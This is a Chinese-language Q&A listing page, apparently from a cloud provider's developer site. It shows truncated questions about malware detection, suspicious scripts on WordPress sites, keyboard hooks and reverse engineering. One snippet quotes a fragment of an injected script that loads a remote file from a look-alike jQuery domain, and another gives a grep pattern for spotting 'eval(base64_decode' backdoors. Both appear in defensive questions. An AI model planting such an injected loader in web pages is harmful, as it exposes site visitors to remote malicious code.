2回答
恶意js?或者它是什么?
、、、
我在一个客户网站(wp)上工作,我在标题中发现了一些看起来很恶意的东西-我已经在网络上搜索了它是什么,但我似乎找不到任何答案-你能帮我吗?我找到的代码是
<noscript
浏览 9提问于2016-08-23得票数 0
回答已采纳
由于我们不扫描嵌入的恶意Javascript,或者报告中建议的“恶意代码”,所以给这个特性分配了CVSS的中介风险。当然,没有恶意JS代码的定义。通过阅读adobe的文档1,我们似乎做出了合理的努力来确定JS代码是否是恶意的。来自adobe1的努力是否足够?如果我们不扫描嵌
浏览 0提问于2018-10-16得票数 3
是否有恶意软件可以在不需要用户交互/启动的情况下自动从internet上下载即可运行。这不是出于恶意目的,我是一名网络证券专业的学生。我最近在tiktok上看到一段视频,内容是网络查克( network ),他解释了一个恶意软件,不知何故隐藏了一个.exe文件,它有一个pdf的图标,一旦点击,我就不记得<em
浏览 0提问于2022-10-10得票数 2
最近,我一直在研究恶意软件是如何工作的,最近的一个著名的宙斯机器人( Zeus ),我注意到了一件我似乎不理解的事情:据说恶意软件能够将API挂在进程中,并使用它们窃取数据。但是,如果特洛伊木马本身是一个exe文件,它是如何做这些事情的?
它是否携带了一个DLL来执行所有的挂钩,或者它是否将外壳代码注入到它想要修改的进程中,或者其他什么东西?
浏览 0提问于2016-01-26得票数 2
1回答
它是恶意软件还是两者兼而有之?那么入侵和恶意软件有什么区别呢?
系统调用序列能否确定系统中存在入侵?或者无效的syscall序列只能检测恶意软件。如果我想监视syscall,我是否可以在用户空间(例如使用systrace )进行监视,或者只能在内核空间进行监视?最好的方法是什么?
浏览 0提问于2016-01-05得票数 -1
我正在使用Node.js创建web服务。在实现过程中,我使用了许多通过npm安装的第三方模块。如果使用的模块中存在恶意*.js脚本,则存在安全性问题。例如,恶意代码可能会删除我的所有磁盘文件,或者安静地收集机密数据。
谢谢,杰弗里
浏览 1提问于2013-08-02得票数 5
回答已采纳
我很好奇是否有可能将恶意软件从Android设备转移到桌面计算机。在我的情况下,我已经通过Lookout在我的android设备上检测到了恶意软件,并迅速删除了受感染的应用程序;然而,在恶意软件检测时,我已经打开了该应用程序。删除该应用程序后,在设备上没有发现恶意软件(根据Lookout的说法),但我怀疑它是不是“消失了”。没有奇怪的弹出窗口或短信垃圾邮件什么的,所以不确定这是一个背景恶意软件,或它是否真的消失了。文件在哪个平台上扫描恶意</e
浏览 0提问于2016-09-24得票数 2
4回答
假设一台机器有恶意软件,不管它是如何到达那里的,我想要学习的一件事是获取二进制文件并反向工程它,看看恶意软件正在做什么/已经做了什么。
最好知道什么已经被破坏了,以及寻找成功地删除它的路线。我已经找到了一些工具,比如IDAPro和OllyDbg,这些工具被证明是有用的,但是,我不会撒谎,假装我知道要查找什么,或者每种方法中显示的数据。什么是学习和真正理解这些调试器中显示的数据的好资源,以及一些用于恶意软件的
浏览 0提问于2011-01-21得票数 21
回答已采纳
1回答
我正在尝试构建一个shell脚本,它可以自动检测恶意软件、后门和rootkit,我也在对它进行研究。我发现了一些东西find .-name “*.php” | xargs grep -l “eval(base64_decode”
但我并不是只找到这些相关的.php和.js文件,并试图看看它是否包含恶意软件。谁能帮我给出一个大致的想法,我可以使用的脚本,以便它可以做的工作,恶意软件,后
浏览 0提问于2013-07-29得票数 5
回答已采纳
1回答
键盘钩子天生是恶意的吗?
、、、
我的软件使用低级别键盘和鼠标Win32挂钩是有正当理由的(如果有任何相关的话,它是用来确定VBA中活动代码窗格插入符号位置的更改)。Windows Defender将我的安装程序标记为“恶意”:与赛门铁克一样,可能还有其他防病毒/恶意软件检测工具。我以前在赛门铁克上也遇到过类似的假阳性的“恶意软件警报”问题,据推测是因为这个文件是最近的并且/或下载很少,但是这些旧版本没有使用Win32低级键盘挂钩,并且AFAIK没有被Windows标记为“恶意”我没有实现密钥记录器;我不处理除V
浏览 0提问于2016-04-29得票数 10
1回答
或者它是什么?
、、、、
我不明白或者..。我做得对吗?如果我只是复制粘贴链接,这是否意味着我正在将视频从网络主机#1流式传输到网络主机#2?是对的吗?这就是为什么我将视频大小调整为640x480,并与HTML5兼容的原因。很抱歉我的帖子太长了,我的英语也不好。
谢谢!
浏览 2提问于2012-04-19得票数 2
回答已采纳
1回答
我有个关于恶意软件的问题。恶意软件通过攻击向量攻击机器。当它渗入机器时,它“释放”有效载荷。现在,假设我感染了一种病毒,它是在我不知情的情况下通过互联网网页(或者弹出或其他)下载和安装的。因此,攻击矢量是传递方式,有效载荷是实际恶意软件。函数/方法的名称是什么,它发起病毒的转移(从网页)?
为了详细说明,根据我的理解,一个人实际上被恶意软件感染,必须有三个步骤的过程。恶意软件感染包括三个步骤,是吗?
浏览 0提问于2016-07-05得票数 0
回答已采纳
2回答
我使用恶意程序字节,每次访问wordpress站点时,它都会阻止试图在页面上运行的脚本,脚本如下: if (!document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js{
document.wr
浏览 0提问于2014-06-18得票数 1
回答已采纳
3回答
今天早上我被攻击了,并在我的网站上注射了一些JS。我正试着找到那个洞并修补它。我的印象是下面的PDO是安全的,有人能证实或否认这一点吗?
浏览 3提问于2012-07-13得票数 1
回答已采纳
我有一个系统的上传文件功能,它是由一个反病毒,扫描上传的文件。AV检测诸如EICAR文件、msfvenom payloads...but等恶意文件,而不是包含XSS的JS文件。
我想知道这是为什么。
浏览 0提问于2020-07-06得票数 0
我想知道使用隐写分析工具检测或研究恶意软件对恶意软件研究人员或AV产品是否有用。如果是这样的话,是否有一个标准的隐写分析工具被普遍使用,或者它是否因分析师而异?
浏览 0提问于2020-01-22得票数 0
回答已采纳
1回答
像.js、.wsf、VBA宏这样的恶意脚本是否在运行时被扫描?我注意到,如果扫描时未检测到恶意脚本,也不会在运行时检测到恶意脚本,只能检测到下载的文件。所有这些脚本都从internet下载文件并启动它,所以我想知道是否在运行时检测到这种行为,或者AVs是否等待下载的文件被执行,然后检查该文件是否是恶意的。我认为所有文件都不是在扫描时检测到的。
浏览 0提问于2016-09-03得票数 0
回答已采纳
1回答
很明显,wordpress项目包含一个恶意软件,它编辑js文件并修改href链接的值。可悲的是,恶意软件被部署在整个根目录上。我的意思是恶意软件也适用于主项目的js文件。为了避免在整个主项目中发布恶意软件(它存在于wordpress项目(它是主要项目的一部分)中)?
我在某个地方读到,您可以在linux上隔离一个目录,就像另一台服务器一样。知道我该怎么做吗?
浏览 0提问于2018-03-04得票数 2
回答已采纳
对于课程作业,我必须分析恶意软件。我想知道如何才能在不执行恶意软件的情况下解压?我使用了ProcDump32,但它告诉我:“进程不是32位的,或者无法加载,或者已经完成了!”
浏览 2提问于2011-02-24得票数 0
我得到了一个从大型机下载的文件,用户认为它是恶意的。我们有一个专门为取证而设计的单独的Windows10环境。管理员使用filezilla连接到大型机,并将文件下载到取证windows环境中。我想扫描文档,找出是否有任何隐藏的脚本或宏,然后想打开文档,找出写了什么。 谢谢你的帮助。
浏览 15提问于2020-09-23得票数 1
云服务器
ICP备案
对象存储
云直播
腾讯会议
腾讯云开发者
